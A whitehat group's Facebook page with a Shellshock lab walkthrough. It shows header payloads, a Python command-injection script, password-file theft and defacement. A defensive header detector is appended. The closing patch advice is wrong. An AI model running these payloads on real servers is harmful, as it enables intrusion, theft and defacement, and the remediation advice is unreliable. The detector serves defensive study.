Finhackers(whitehat group) (whitehat tutorials)

About

We're a small group of Ethical Hackers, penetration testers and programmers. We accept members from all around the world, even though our name is FinHackers.

The Hackers Creed (Steven Levy, 1984, Hackers: Heroes of the Computer Revolution)
Access to computers - and anything which might teach you something about the way the world works - should be unlimited and total. Always yield to the Hands-On imperative!
All information should be free.
Mistrust authority - promote decentralization.
Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, gender or position.
You can create art and beauty on a computer.
Computers can change your life for the better.

Code of Ethics
Respect privacy
Serve and protect the community
Share knowledge with the community
Do not take personal copies of someone else's data
Do not perform unauthorized testing
Do not discuss findings with unauthorized people
Do not publish vulnerabilities without permission
Observe all legal requirements
Act with integrity
Avoid conflicts of interest
Avoid FUD (Fear Uncertainty and Doubt)
Protect everyone's data (encryption etc.)
Do not associate with black-hat hackers

Please remember the last line ("Do not associate with black-hat hackers") BEFORE thinking of asking us to help with ur BS.....

Current members:
The_Emankcin
w0lv3rine
3RR0RDUD3
bextpentester
hernandocounty
Enigma

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Check us out @ fb https://www.facebook.com/FinHackers/

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Shell upload tutorial By The_Emankcin
https://www.youtube.com/watch?v=i32LVrRXghQ

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Stored XSS attack tutorial by The_Emankcin
https://www.youtube.com/watch?v=kfAmQ0wVANA

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Hello, just to make sure that everyone understands:
We do NOT teach you anything related to Black Hat hacking!

Finhackers(whitehat group) (whitehat tutorials)
January 21, 2016 · Public

Hello, this is a short story about a thing called
Shellshock Bashbug. (spooky)
-----------------------------------------------------------------------------
this data is for educational and legal purposes only.
Illegal use of any kind is forbidden.
Always remember that hacking without permission is illegal.
(never do so)
this is only to show / intro the dangers of bashbug.
-----------------------------------------------------------------------------
So, first, what is this little thing called Bashbug?
Shellshock bashbug is a Linux/Unix vulnerability that was detected last year. It allows an attacker to execute shell code (Linux terminal commands, etc.)
via carefully crafted HTTP requests.
So, I decided to set up a vulnerable server, and go to play with it
for a while.
So, after installing a vulnerable version of Linux in Oracle VirtualBox,
I started testing.
First, send this kinda HTTP request to the server:
GET /index.html HTTP/1.1
Host: xxx.xxx.xxx.xx
Cookie: () { :; }; chmod 777 ../../*
referer: () { :; }; mkdir test ../../var/www/
and then tried this URL: xxxxxxxxx/test
Surprisingly, it showed me the /test directory p:
After that, the next request:
GET /index.html HTTP/1.1
Host: xxxxxxxx
Cookie: () { :; }; echo "" >> ../../var/www/index.html
Now, going to check the HTML at index.html
And bang! There, at the last line of the HTML, text:
So now I know that I have privileges to write & read files.
Then, the next thing I'm doing is to collect some data from the server...
I want to make it faster, so I'm writing a simple Python script:
(BTW, cuz of Facebook, indentation is not working, so I'm marking whitespace with .)
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("xxx.xx.xxx.38", 80))
send = True
while send == True:
...command = raw_input("Command to execute: ")
...req = ( "GET / HTTP/1.1\r\n",
.............."Host: xxxxxxxxxxxxx\r\n",
..............."Cookie: () { :; }; "+str(command)+"\r\n"
...)
....try:
........s.send(str(req))
....except socket.error:
........print "Can't send the request, shutting down..."
........s.close()
........send = False
Then, sending these commands to the server:
cat ../../etc/passwd >> ../../var/www/test/new.txt (creating the new.txt file.)
cat ../../etc/shadow >> ../../var/www/test/new.txt
and now saved the password data to my "real" computer. Then modified the code a bit
by adding a variable "Deface" to the code, with defacement code, and then this command:
s.send("cat " + str(Deface) + " >> ../../var/www/index.html)
Now the page is defaced, server passwd files are stolen etc., so I would say it's kinda well fuck'd up.
That's all for this time. Always remember that if hosting with Linux, use version 2.8 or later.
The_Emankcin
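
The defender's view of the requests in the post above, as an added example that is not part of the original post: a web server hands request headers to CGI programs as environment variables, so a header value that starts like a bash function definition is the thing to flag in captured requests. The function names, the host `lab.example` and both sample requests are constructed for this illustration.

```python
import re

# A header value that begins like a bash function definition: "() {".
# Whitespace variants are accepted too, to be conservative.
FUNC_DEF = re.compile(r"^\s*\(\s*\)\s*\{")

def parse_headers(raw_request):
    """Return (name, value) pairs from a raw HTTP/1.x request head."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:       # skip the request line
        name, sep, value = line.partition(":")
        if sep:                               # ignore lines without a colon
            pairs.append((name.strip(), value.strip()))
    return pairs

def shellshock_headers(raw_request):
    """Names of headers whose value starts like a function definition."""
    return [name for name, value in parse_headers(raw_request)
            if FUNC_DEF.match(value)]

# Constructed samples, not captured traffic. SUSPECT mirrors the header
# shape shown in the post, with a harmless command after the definition.
BENIGN = ("GET /index.html HTTP/1.1\r\n"
          "Host: lab.example\r\n"
          "Cookie: session=abc123; note=() { not at start\r\n"
          "\r\n")
SUSPECT = ("GET /index.html HTTP/1.1\r\n"
           "Host: lab.example\r\n"
           "Cookie: () { :; }; echo marker\r\n"
           "referer: () { :; }; echo marker\r\n"
           "\r\n")

if __name__ == "__main__":
    for label, request in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, shellshock_headers(request))
```

The same pattern can be applied to the cookie, referer and user-agent fields of web server access logs, where those fields are logged.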